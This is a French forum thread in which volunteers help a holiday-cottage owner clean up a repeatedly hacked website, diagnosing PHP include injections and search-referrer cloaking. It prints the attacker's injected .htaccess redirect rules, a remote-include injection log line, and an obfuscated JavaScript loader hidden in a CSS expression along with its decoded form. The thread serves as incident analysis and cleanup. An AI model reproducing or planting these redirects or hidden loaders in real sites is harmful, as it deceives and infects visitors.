Discussion :

[FoxLeRenard]

Si on veut pouvoir garder la possibilité d'appeler des pages extérieures! La solution de snafu est plus restrictive mais aussi efficace non?

Exactement

[supersnail]

Bonjour,
Effectivement,la correction a l'air de marcher (le www.google.fr marche pas ),par contre,vaut mieux éviter les includes pour la prochaine fois (le log de 18h42 est de moi aussi )

(comme se méfier des uploads de fichiers et tout ça )

PS: l'enregistement des IP n'est pas une bonne solution je pense,car la plupart des hackers se cachent derrière des proxies,voire même piratent des ordinateurs d'innocents dans un but "maléfique"

[FoxLeRenard]

Bonjour,
comme se méfier des uploads de fichiers et tout ça

Vraiment les seuls upload facile a contrôler restent ceux qui ont un type-mine contôlable.
A ce sujet perso, je me suis limiét aux images que je change de taille par PHP
détruisant de ce fait tout code inclus.

PS: l'enregistement des IP n'est pas une bonne solution je pense,car la plupart des hackers se cachent derrière des proxies,voire même piratent des ordinateurs d'innocents dans un but "maléfique"

Il faut accepter que l'IP de la majoritée des visiteurs change sans arret !
par contre entre la saisie d'un login et son contrôle, c'est une superbe arme !
pratiquemnt imparable !

[gitedoublel]

Bon ben voila, le problème parait définitivement résolu, immense merci tt le monde!!!!

Y'a pas mal d'injections sur le fichier logs.txt, mais difficile de différencier les erreurs de réelles tentatives...
Y'en a quand même pas mal les même avec un numéro en guise d'adresse, je sais pas si ça peut être ça...
Moi je suis a fond dans les séjours maintenant, je repasserai sur ce forul pour... faire profite de mon expérience?

[gitedoublel]

Et meeeeeeeeerde!
ca a recommencé! ca a tenu longtemps cette fois...
Je le laisse un peu comme ça, si y'en a qui veulent passer voir...
y'a des injections sur le fichiers logs.txt, dont une adresse longue et bizare, je sais pas si ça permet de savoir quelque chose...
De toutes façons pour nous la saison bat son plein, mais bon...

[s.n.a.f.u]

Font chier ces hackers à deux balles qui profitent de l'inexpérience des gens.
On voit bien l'ip cible dans le log et le nombre d'essais qu'ils ont faits, mais je ne vois pas la conséquence, tu as dû corriger entretemps.
Aurais-tu gardé le fichier ou l'url posant problème ?

Un bon signe néanmoins : ils ne doivent pas avoir les mots de passe ftp, parce que vu le nombre d'attaques sur /etc/passwd , ils l'ont bien cherché sans réussir.

A suivre...

[supersnail]

Bonjour,

Ce que je peux te conseiller de faire,c'est de loguer TOUT ce qui entre,même les "includes" légitimes,ce qui te permet ensuite d'analyser ce qu'il se passe...
(parce que l'attaque réussie se fera pas logguer sinon ^^)

PS: dans tes logs,il y a des lignes comme

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

hacker = xx.xx.xx.xx 		 injection = http://217.218.225.2:2082/index.html?

et il semblerait que cette "faille" soit connue.
Autre conseil : Ne mets pas tes logs dans le réertoire du serveur,car tout le monde y a accès

[gitedoublel]

Font chier ces hackers à deux balles qui profitent de l'inexpérience des gens.
On voit bien l'ip cible dans le log et le nombre d'essais qu'ils ont faits, mais je ne vois pas la conséquence, tu as dû corriger entretemps.
Aurais-tu gardé le fichier ou l'url posant problème ?

Un bon signe néanmoins : ils ne doivent pas avoir les mots de passe ftp, parce que vu le nombre d'attaques sur /etc/passwd , ils l'ont bien cherché sans réussir.

A suivre...

Non, je n'ai rien corrigé, mais c'est bizzare, quand je vai sur mon site depuis ma barre d'adresse, c'est normal, mais c'est quand j'y vai depuis google il apparait piraté... peut être que c'est pareil pour vous?

[FoxLeRenard]

Non, je n'ai rien corrigé, mais c'est bizzare, quand je vai sur mon site depuis ma barre d'adresse, c'est normal, mais c'est quand j'y vai depuis google il apparait piraté... peut être que c'est pareil pour vous?

C'est trés inquiétant,
il faudrait que nous ayons la totalitée des éléments clé de ton site
l'index
tout ces javascripts
les feuilles de style
le htaccess
(ceux qui sont sur ton site)

En effet on voit bien que le ménage n'est pas fait, et mon diagnostique est que lorsque la page qui possede le lien qui pointe chez toi, est google
alors il y a virus et attaque du micro qui visite

Seuls les fichiers que je t'ais mentionnés sonr intéressants mais il faut CEUX PRESENT sur ton site web.

Alors si tu es OK récupéres les sur ton micro ZIP (avec winzip pas de rAR)
et mets ça sur ton site, mets moi le lien par MP avec en copie s.n.a.f.u
et s' il le souhaite sabotage donc les trois modérateurs qui ont participés a cette discution. bien sur la confidentiakitée sera préservée !

[s.n.a.f.u]

Là j'avoue que je sèche !
J'ai un accès ssh au site du gite, et tout me parait correct.
Le .htaccess est nickel, le fichier index.html ne comprend pas de javascript et il n'y a pas d'autre index.

De plus, le diagnostic même m'épate : lorsqu'on tape l'adresse dans la barre, on tombe sur le site et il est bon, mais effectivement par google on atterrit sur autre chose. Plus étonnant : si tu fais back à partir de ce site pirate, tu retombes sur le bon site.

De plus, la version dans le cache de google est la bonne.

Donc :

En attendant, je me suis permis d'enregistrer le site sur les outils de webmaster de google et je vais voir s'il est possible de les joindre pour avoir une explication.

Ceci dit, je suis en pleine lan ce soir, donc je dirais à suivre, je dois retourner sur counter strike...

[FoxLeRenard]

Là j'avoue que je sèche !
J'ai un accès ssh au site du gite, et tout me parait correct.
Le .htaccess est nickel, le fichier index.html ne comprend pas de javascript et il n'y a pas d'autre index.

Alors la je suis largué !! je croyais que c'était le site de gitedoublel

bref si je ne peut avoir ces fichiers je ne peux aider personne !
c' est le serveur qui lorsque l'origine du visiteur est google, a un trou énorme !
d'autre part il me faut dans ma liste tout les fichiers include aussi !

[mon_nom_est_personne]

question a la con:
L'url du site indexée dans google est-elle la bonne ?
Car j'ai eu le tour, en fait il n'y avais pas d'injection, mais l'inverse, ils injectaient mon contenue dans leur page et avec un bonne seo, on pouvait se faire avoir.

[supersnail]

@mon_nom_est_personne : L'url est la bonne,car si tu F5,tu retombes sur le bon site.

J'ai essayé sur un autre moteur de recherche (altaVista),et là on tombe directement sur le bon site...

Il semblerait donc que ce soit google qui buggue (car en regardant bien,notre cher google effectue un lien vers une de ses pages qui nous redirige vers le site...)
Il est donc très probable que la hacker exploite une faille de google et non du site...

Regarde par ailleurs si t'as pas une ligne du genre:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

strpos($_SERVER["HTTP_USER_AGENT"],"Googlebot");

[FoxLeRenard]

Excelente analyse, je suis 100% OK avec toi !

[gitedoublel]

Ouah!

Je ne sais que dire, en fait je répond juste pour vous signifier que je vous lis!
Par contre, en réponse surtout a snafu, je ne sais pas si le .htaccess est correct, mais ce n'est pas moi qui l'ai mis! Il réapparait a chaque fois que le site se fait pirater!
il y a par ailleurs un dossier plein de fichiers ajouté lui aussi...
Et pour supersnail, en effet, ça a l'air d'être la même attaque dont parlenr ces gens, avec le même numéro que celui enregistré dans le fichier logs de snafu...
C'est à la mode!

Edit: par ailleurs, j'ai trouvé dans le ftp un fichier vide nommé: google3b11ec2593a482c8.html

C'est louche ça! Ca ferait pas avancer le chmilblik?

[FoxLeRenard]

1) le fichier vide est en fait la clé du contrat google pour le moteur de recherche que tu as je penses ?
2) tu a un htaccess ou une partie du texte est cachée donc a premiére vue on ne le vois pas !

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
 
SetEnv REGISTER_GLOBALS 0
SetEnv ZEND_OPTIMIZER 1
SetEnv MAGIC_QUOTES 0
SetEnv PHP_VER 5
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /bouncy/qasoje/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c

3) tu a un enorme virus qui genere un trojan dans rbc_nav_styles.css
si tu as un excelent antivirus, telecharges ce fichier par ftp et tu verras !

je vais réparer certaines choses par contre de quel répertoire parles-tu ?

[supersnail]

Bonjour,

@FoxLeRenard: il sort d'où le .htaccess?

[FoxLeRenard]

Désolé l'ami, mais ne pouvant avancer depuis que nous patageons ça avec toi et d'autres, gitedoublel a donné a deux modérateurs un mot de passe provisoir de FTP.

Avec ce que nous avons observé s.n.a.f.u et moi, nous essayons de vous faire partager nos découvertes.

j'espéres que tu comprends que nous ne pouvions guére faire autrement

[supersnail]

Effectivement,pour se "débarrasser" temporairement du hack,il faut supprimer le dossier "bouncy/qasoje" plus cette partie du .htaccess:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
 
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /bouncy/qasoje/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c

Ou sinon plus radical,mettre "AllowOverride None" à la place de "AllowOverride All" dans ton fichier de conf d'apache pour empêcher l'exécution des .htaccess

Edit 1: Dans le fichier rbc_nav_styles.css on trouve cette ligne bizarre:

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%33%32%34%35%39%39%37%3B%20%4A%53%53%33%20%3D%20%27%2F%62%6F%75%6E%63%79%2F%71%61%73%6F%6A%65%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%62%6F%75%6E%63%79%2F%71%61%73%6F%6A%65%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */

Et par curiosité,j'ai fait un unescape de la chaîne,et on trouve que ce code se trouve exécuté:

Code javascript :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
 
if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 3245997; JSS3 = '/bouncy/qasoje/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src', '/bouncy/qasoje/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };

Edit 2: les conseils qu'on t'as donné auparavant,les as-tu aussi appliqués sur le dossier bouncy? (les protections anti-include)
Parce que je parie que c'est par là que les pirates sont entrés

PS: on peut accéder au hack par cette URL: http://www.gitedoublel.com/bouncy/qasoje/ex3/t.htm

[FoxLeRenard]

Effectivement,pour se "débarrasser" temporairement du hack,il faut supprimer le dossier "bouncy" plus cette partie du .htaccess: etc .........

20/20 l'Ami on voit que tu domine ça !
Oui, ce sont les failles de ce site mais surtout beaucoup de chgmod a faire pfffff ...